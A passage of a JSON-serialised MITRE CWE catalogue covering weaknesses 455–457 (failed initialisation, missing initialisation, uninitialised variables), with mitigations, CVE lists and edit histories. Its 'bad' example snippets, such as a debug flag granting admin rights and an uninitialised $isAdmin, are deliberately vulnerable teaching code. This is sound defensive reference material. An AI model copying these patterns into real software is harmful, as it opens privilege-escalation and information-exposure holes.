true;","attr":{"@_style":"margin-left:10px;"}},{"#text":"if($debugEnabled){}","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"echo \'Debug Activated\';phpinfo();$isAdmin = True;return True;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","",""]}}],"xhtml:i":"/.../"}},"Body_Text":["Any user can activate the debug mode, gaining administrator privileges. An attacker may also use the information printed by the phpinfo() function to further exploit the system. .","This example also exhibits Information Exposure Through Debug Information (CWE-215)"]}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2000-0959","Description":"Does not clear dangerous environment variables, enabling symlink attack.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0959"},{"Reference":"CVE-2001-0033","Description":"Specify alternate configuration directory in environment variable, enabling untrusted path.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0033"},{"Reference":"CVE-2001-0872","Description":"Dangerous environment variable not cleansed.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0872"},{"Reference":"CVE-2001-0084","Description":"Specify arbitrary modules using environment variable.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0084"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"External initialization of trusted variables or values"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP25","Entry_Name":"Tainted input to variable"}]},"Notes":{"Note":[{"#text":"Overlaps Missing variable initialization, especially in PHP.","attr":{"@_Type":"Relationship"}},{"attr":{"@_Type":"Applicable Platform"},"xhtml:p":"This is often found in PHP due to register_globals and the common practice of storing library/include files under the web document root so that they are available using a direct request."}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Description, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Other_Notes, Relationship_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Description, Name, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":[{"#text":"External Initialization of Trusted Variables or Values","attr":{"@_Date":"2008-04-11"}},{"#text":"External Initialization of Trusted Variables","attr":{"@_Date":"2010-02-16"}}]}},"455":{"attr":{"@_ID":"455","@_Name":"Non-exit on Failed Initialization","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not exit or otherwise modify its operation when security-relevant errors occur during initialization, such as when a configuration file has a format error, which can cause the software to execute in a less secure fashion than intended by the administrator.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"665","@_View_ID":"1000"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"705","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"636","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Other"],"Impact":["Modify Application Data","Alter Execution Logic"],"Note":"The application could be placed in an insecure state that may allow an attacker to modify sensitive data or allow unintended logic to be executed."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Follow the principle of failing securely when an error occurs. The system should enter a state where it is not vulnerable and will not display sensitive error messages to a potential attacker."}},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-54"},"Intro_Text":"The following code intends to limit certain operations to the administrator only.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Perl"},"xhtml:div":{"#text":"$username = GetCurrentUser();$state = GetStateData($username);if (defined($state)) {}if ($uid == 0) {}","xhtml:br":["","","","",""],"xhtml:div":[{"#text":"$uid = ExtractUserID($state);","attr":{"@_style":"margin-left:10px;"}},{"#text":"DoAdminThings();","attr":{"@_style":"margin-left:10px;"}}],"xhtml:i":"# do stuff"}},"Body_Text":"If the application is unable to extract the state information - say, due to a database timeout - then the $uid variable will not be explicitly set by the programmer. This will cause $uid to be regarded as equivalent to \\"0\\" in the conditional, allowing the original user to perform administrator actions. Even if the attacker cannot directly influence the state data, unexpected errors could cause incorrect privileges to be assigned to a user just by accident."}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2005-1345","Description":"Product does not trigger a fatal error if missing or invalid ACLs are in a configuration file.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1345"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Non-exit on Failed Initialization"}},"Notes":{"Note":{"#text":"Under-studied. These issues are not frequently reported, and it is difficult to find published examples.","attr":{"@_Type":"Research Gap"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"}]}},"456":{"attr":{"@_ID":"456","@_Name":"Missing Initialization of a Variable","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not initialize critical variables, which causes the execution environment to use unexpected values.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"909","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"665","@_View_ID":"1305","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"665","@_View_ID":"1340","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"89","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"120","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"98","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"457","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Other"],"Impact":["Unexpected State","Quality Degradation","Varies by Context"],"Note":"The uninitialized data may be invalid, causing logic errors within the program. In some cases, this could result in a security problem."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Check that critical variables are initialized."},{"Phase":"Testing","Description":"Use a static analysis tool to spot non-initialized variables."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"This function attempts to extract a pair of numbers from a user-supplied string.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"void parse_data(char *untrusted_input){}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"int m, n, error;error = sscanf(untrusted_input, \\"%d:%d\\", &amp;m, &amp;n);if ( EOF == error ){}","xhtml:br":["","","",""],"xhtml:div":{"#text":"die(\\"Did not specify integer value. Die evil hacker!\\\\n\\");","attr":{"@_style":"margin-left:10px;"}},"xhtml:i":"/* proceed assuming n and m are initialized correctly */"}}}},{"attr":{"@_Nature":"attack"},"xhtml:div":"123:"}],"Body_Text":["This code attempts to extract two integer values out of a formatted, user-supplied input. However, if an attacker were to provide an input of the form:","then only the m variable will be initialized. Subsequent use of n may result in the use of an uninitialized variable (CWE-457)."]},{"Intro_Text":"Here, an uninitialized field in a Java class is used in a seldom-called method, which would cause a NullPointerException to be thrown.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"private User user;public void someMethod() {}","xhtml:br":"","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"...String username = user.getName();","xhtml:br":["","","","",""],"xhtml:i":["// Do something interesting.","// Throws NPE if user hasn\'t been properly initialized."]}}}}},{"Intro_Text":"This code first authenticates a user, then allows a delete command if the user is an administrator.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"if (authenticate($username,$password) &amp;&amp; setAdmin($username)){}if ($isAdmin){}","xhtml:div":[{"#text":"$isAdmin = true;","attr":{"@_style":"margin-left:10px;"}},{"#text":"deleteUser($userToDelete);","attr":{"@_style":"margin-left:10px;"}}],"xhtml:br":["","",""],"xhtml:i":"/.../"}},"Body_Text":"The $isAdmin variable is set to true if the user is an admin, but is uninitialized otherwise. If PHP\'s register_globals feature is enabled, an attacker can set uninitialized variables like $isAdmin to arbitrary values, in this case gaining administrator privileges by setting $isAdmin to true."},{"Intro_Text":"In the following Java code the BankManager class uses the user variable of the class User to allow authorized users to perform bank manager tasks. The user variable is initialized within the method setUser that retrieves the User from the User database. The user is then authenticated as unauthorized user through the method authenticateUser.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public class BankManager {}","xhtml:br":"","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"private User user = null;private boolean isUserAuthentic = false;public BankManager() {}public User getUserFromUserDatabase(String username){}public void setUser(String username) {}public boolean authenticateUser(String username, String password) {}...","xhtml:br":["","","","","","","","","","","","","","","","","",""],"xhtml:i":["// user allowed to perform bank manager tasks","// constructor for BankManager class","// retrieve user from database of users","// set user variable using username","// authenticate user","// methods for performing bank manager tasks"],"xhtml:div":[{"#text":"...","attr":{"@_style":"margin-left:10px;"}},{"#text":"...","attr":{"@_style":"margin-left:10px;"}},{"#text":"this.user = getUserFromUserDatabase(username);","attr":{"@_style":"margin-left:10px;"}},{"#text":"if (username.equals(user.getUsername()) &amp;&amp; password.equals(user.getPassword())) {}return isUserAuthentic;","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"isUserAuthentic = true;","attr":{"@_style":"margin-left:10px;"}},"xhtml:br":""}]}}}},{"attr":{"@_Nature":"good","@_Language":"Java"},"xhtml:div":{"#text":"public class BankManager {}","xhtml:br":"","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"private User user = null;private boolean isUserAuthentic = false;public BankManager(String username) {}public User getUserFromUserDatabase(String username) {...}public boolean authenticateUser(String username, String password) {}","xhtml:br":["","","","","","","","","","","","","",""],"xhtml:i":["// user allowed to perform bank manager tasks","// constructor for BankManager class","// retrieve user from database of users","// authenticate user"],"xhtml:div":[{"#text":"user = getUserFromUserDatabase(username);","attr":{"@_style":"margin-left:10px;"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if (user == null) {}else {}return isUserAuthentic;","xhtml:div":[{"#text":"System.out.println(\\"Cannot find user \\" + username);","attr":{"@_style":"margin-left:10px;"}},{"#text":"if (password.equals(user.getPassword())) {}","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"isUserAuthentic = true;","attr":{"@_style":"margin-left:10px;"}}}],"xhtml:br":["",""]}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"...","xhtml:br":["",""],"xhtml:i":"// methods for performing bank manager tasks"}}]}}}}],"Body_Text":"However, if the method setUser is not called before authenticateUser then the user variable will not have been initialized and will result in a NullPointerException. The code should verify that the user variable has been initialized before it is used, as in the following code."},{"attr":{"@_Demonstrative_Example_ID":"DX-144"},"Intro_Text":"This example will leave test_string in an\\n\\t\\t\\t  unknown condition when i is the same value as err_val,\\n\\t\\t\\t  because test_string is not initialized\\n\\t\\t\\t  (CWE-456). Depending on where this code segment appears\\n\\t\\t\\t  (e.g. within a function body), test_string might be\\n\\t\\t\\t  random if it is stored on the heap or stack. If the\\n\\t\\t\\t  variable is declared in static memory, it might be zero\\n\\t\\t\\t  or NULL. Compiler optimization might contribute to the\\n\\t\\t\\t  unpredictability of this address.","Example_Code":[{"#text":"char *test_string;if (i != err_val){}printf(\\"%s\\", test_string);","attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:br":["","","",""],"xhtml:div":{"#text":"test_string = \\"Hello World!\\";","attr":{"@_style":"margin-left:10px;"}}},{"#text":"char *test_string = \\"Done at the beginning\\";if (i != err_val){}printf(\\"%s\\", test_string);","attr":{"@_Nature":"good","@_Language":"C"},"xhtml:br":["","","",""],"xhtml:div":{"#text":"test_string = \\"Hello World!\\";","attr":{"@_style":"margin-left:10px;"}}},{"#text":"char *test_string;if (i != err_val){}else {}printf(\\"%s\\", test_string);","attr":{"@_Nature":"good","@_Language":"C"},"xhtml:br":["","","","","",""],"xhtml:div":[{"#text":"test_string = \\"Hello World!\\";","attr":{"@_style":"margin-left:10px;"}},{"#text":"test_string = \\"Done on the other side!\\";","attr":{"@_style":"margin-left:10px;"}}]}],"Body_Text":[{"xhtml:p":["When the printf() is reached,\\n              test_string might be an unexpected address, so the\\n              printf might print junk strings (CWE-457).","To fix this code, there are a couple approaches to\\n\\t\\t\\t  making sure that test_string has been properly set once\\n\\t\\t\\t  it reaches the printf().","One solution would be to set test_string to an\\n\\t\\t\\t  acceptable default before the conditional:"]},"Another solution is to ensure that each\\n\\t\\t\\t  branch of the conditional - including the default/else\\n\\t\\t\\t  branch - could ensure that test_string is set:"]}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2020-6078","Description":"Chain: The return value of a function returning a pointer is not checked for success (CWE-252) resulting in the later use of an uninitialized variable (CWE-456) and a null pointer dereference (CWE-476)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6078"},{"Reference":"CVE-2009-2692","Description":"Chain: Use of an unimplemented network socket operation pointing to an uninitialized handler function (CWE-456) causes a crash because of a null pointer dereference (CWE-476).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2692"},{"Reference":"CVE-2020-20739","Description":"A variable that has its value set in a conditional statement is sometimes used when the conditional fails, sometimes causing data leakage","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-20739"},{"Reference":"CVE-2005-2978","Description":"Product uses uninitialized variables for size and index, leading to resultant buffer overflow.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2978"},{"Reference":"CVE-2005-2109","Description":"Internal variable in PHP application is not initialized, allowing external modification.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2109"},{"Reference":"CVE-2005-2193","Description":"Array variable not initialized in PHP application, leading to resultant SQL injection.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2193"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Missing Initialization"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP1","Entry_Name":"Glitch in computation"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"ERR30-C","Entry_Name":"Set errno to zero before calling a library function known to set errno,  and check errno only after the function returns a value indicating failure","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"SEI CERT Perl Coding Standard"},"Entry_ID":"DCL04-PL","Entry_Name":"Always initialize local variables","Mapping_Fit":"Exact"},{"attr":{"@_Taxonomy_Name":"SEI CERT Perl Coding Standard"},"Entry_ID":"DCL33-PL","Entry_Name":"Declare identifiers before using them","Mapping_Fit":"Imprecise"},{"attr":{"@_Taxonomy_Name":"OMG ASCSM"},"Entry_ID":"ASCSM-CWE-456"},{"attr":{"@_Taxonomy_Name":"OMG ASCRM"},"Entry_ID":"ASCRM-CWE-456"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 7, &#34;Variable Initialization&#34;, Page 312"}},{"attr":{"@_External_Reference_ID":"REF-961","@_Section":"ASCRM-CWE-456"}},{"attr":{"@_External_Reference_ID":"REF-962","@_Section":"ASCSM-CWE-456"}}]},"Notes":{"Note":[{"#text":"This weakness is a major factor in a number of resultant weaknesses, especially in web applications that allow global variable initialization (such as PHP) with libraries that can be directly requested.","attr":{"@_Type":"Relationship"}},{"#text":"It is highly likely that a large number of resultant weaknesses have missing initialization as a primary factor, but researcher reports generally do not provide this level of detail.","attr":{"@_Type":"Research Gap"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Other_Notes, Relationship_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Name, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples, Observed_Examples, Relationships"}],"Previous_Entry_Name":{"#text":"Missing Initialization","attr":{"@_Date":"2013-02-21"}}}},"457":{"attr":{"@_ID":"457","@_Name":"Use of Uninitialized Variable","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The code uses a variable that has not been initialized, leading to unpredictable or unintended results.","Extended_Description":"In some languages such as C and C++, stack variables are not initialized by default. They generally contain junk data with the contents of stack memory before the function was invoked. An attacker can sometimes control or read these contents. In other languages or conditions, a variable that is not explicitly initialized can be given a default value that has security implications, depending on the logic of the program. The presence of an uninitialized variable can sometimes indicate a typographic error in the code.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"908","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"665","@_View_ID":"1305","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"665","@_View_ID":"1340","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Sometimes"}},{"attr":{"@_Name":"C++","@_Prevalence":"Sometimes"}},{"attr":{"@_Name":"Perl","@_Prevalence":"Often"}},{"attr":{"@_Name":"PHP","@_Prevalence":"Often"}},{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"In C, using an uninitialized char * in some string libraries will return incorrect results, as the libraries expect the null terminator to always be at the end of a string, even if the string is empty."}},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":[{"Scope":["Availability","Integrity","Other"],"Impact":"Other","Note":"Initial variables usually contain junk, which can not be trusted for consistency. This can lead to denial of service conditions, or modify control flow in unexpected ways. In some cases, an attacker can \\"pre-initialize\\" the variable using previous actions, which might enable code execution. This can cause a race condition if a lock variable check passes when it should not."},{"Scope":["Authorization","Other"],"Impact":"Other","Note":"Strings that are not initialized are especially dangerous, since many functions expect a null at the end -- and only at the end -- of a string."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Strategy":"Attack Surface Reduction","Description":"Assign all variables to an initial value."},{"Phase":"Build and Compilation","Strategy":"Compilation or Build Hardening","Description":"Most compilers will complain about the use of uninitialized variables if warnings are turned on."},{"Phase":["Implementation","Operation"],"Description":"When using a language that does not require explicit declaration of variables, run or compile the software in a mode that reports undeclared or unknown variables. This may indicate the presence of a typographic error in the variable\'s name."},{"Phase":"Requirements","Description":"The choice could be made to use a language that is not susceptible to these issues."},{"Phase":"Architecture and Design","Description":"Mitigating technologies such as safe string libraries and container abstractions could be introduced."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"This code prints a greeting using information stored in a POST request:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"if (isset($_POST[\'names\'])) {}echo \\"Hello \\" . $nameArray[\'first\'];","xhtml:div":{"#text":"$nameArray = $_POST[\'names\'];","attr":{"@_style":"margin-left:10px;"}},"xhtml:br":""}},"Body_Text":"This code checks if the POST array \'names\' is set before assigning it to the $nameArray variable. However, if the array is not in the POST request, $nameArray will remain uninitialized. This will cause an error when the array is accessed to print the greeting message, which could lead to further exploit."},{"Intro_Text":"The following switch statement is intended to set the values of the variables aN and bN before they are used:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int aN, Bn;switch (ctl) {}repaint(aN, bN);","xhtml:br":["",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"case -1:case 0:case 1:default:","xhtml:div":[{"#text":"aN = 0;bN = 0;break;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]},{"#text":"aN = i;bN = -i;break;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]},{"#text":"aN = i + NEXT_SZ;bN = i - NEXT_SZ;break;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]},{"#text":"aN = -1;aN = -1;break;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}],"xhtml:br":["","",""]}}}},"Body_Text":"In the default case of the switch statement, the programmer has accidentally set the value of aN twice. As a result, bN will have an undefined value. Most uninitialized variable issues result in general software reliability problems, but if attackers can intentionally trigger the use of an uninitialized variable, they might be able to launch a denial of service attack by crashing the program. Under the right circumstances, an attacker may be able to control the value of an uninitialized variable by affecting the values on the stack prior to the invocation of the function."},{"attr":{"@_Demonstrative_Example_ID":"DX-144"},"Intro_Text":"This example will leave test_string in an\\n\\t\\t\\t  unknown condition when i is the same value as err_val,\\n\\t\\t\\t  because test_string is not initialized\\n\\t\\t\\t  (CWE-456). Depending on where this code segment appears\\n\\t\\t\\t  (e.g. within a function body), test_string might be\\n\\t\\t\\t  random if it is stored on the heap or stack. If the\\n\\t\\t\\t  variable is declared in static memory, it might be zero\\n\\t\\t\\t  or NULL. Compiler optimization might contribute to the\\n\\t\\t\\t  unpredictability of this address.","Example_Code":[{"#text":"char *test_string;if (i != err_val){}printf(\\"%s\\", test_string);","attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:br":["","","",""],"xhtml:div":{"#text":"test_string = \\"Hello World!\\";","attr":{"@_style":"margin-left:10px;"}}},{"#text":"char *test_string = \\"Done at the beginning\\";if (i != err_val){}printf(\\"%s\\", test_string);","attr":{"@_Nature":"good","@_Language":"C"},"xhtml:br":["","","",""],"xhtml:div":{"#text":"test_string = \\"Hello World!\\";","attr":{"@_style":"margin-left:10px;"}}},{"#text":"char *test_string;if (i != err_val){}else {}printf(\\"%s\\", test_string);","attr":{"@_Nature":"good","@_Language":"C"},"xhtml:br":["","","","","",""],"xhtml:div":[{"#text":"test_string = \\"Hello World!\\";","attr":{"@_style":"margin-left:10px;"}},{"#text":"test_string = \\"Done on the other side!\\";","attr":{"@_style":"margin-left:10px;"}}]}],"Body_Text":[{"xhtml:p":["When the printf() is reached,\\n              test_string might be an unexpected address, so the\\n              printf might print junk strings (CWE-457).","To fix this code, there are a couple approaches to\\n\\t\\t\\t  making sure that test_string has been properly set once\\n\\t\\t\\t  it reaches the printf().","One solution would be to set test_string to an\\n\\t\\t\\t  acceptable default before the conditional:"]},"Another solution is to ensure that each\\n\\t\\t\\t  branch of the conditional - including the default/else\\n\\t\\t\\t  branch - could ensure that test_string is set:"]}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2019-15900","Description":"Chain: sscanf() call is used to check if a username and group exists, but the return value of sscanf() call is not checked (CWE-252), causing an uninitialized variable to be checked (CWE-457), returning success to allow authorization bypass for executing a privileged (CWE-863).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15900"},{"Reference":"CVE-2008-3688","Description":"Chain: A denial of service may be caused by an uninitialized variable (CWE-457) allowing an infinite loop (CWE-835) resulting from a connection to an unresponsive server.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3688"},{"Reference":"CVE-2008-0081","Description":"Uninitialized variable leads to code execution in popular desktop application.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0081"},{"Reference":"CVE-2007-4682","Description":"Crafted input triggers dereference of an uninitialized object pointer.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4682"},{"Reference":"CVE-2007-3468","Description":"Crafted audio file triggers crash when an uninitialized variable is used.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3468"},{"Reference":"CVE-2007-2728","Description":"Uninitialized random seed variable used.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2728"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Uninitialized 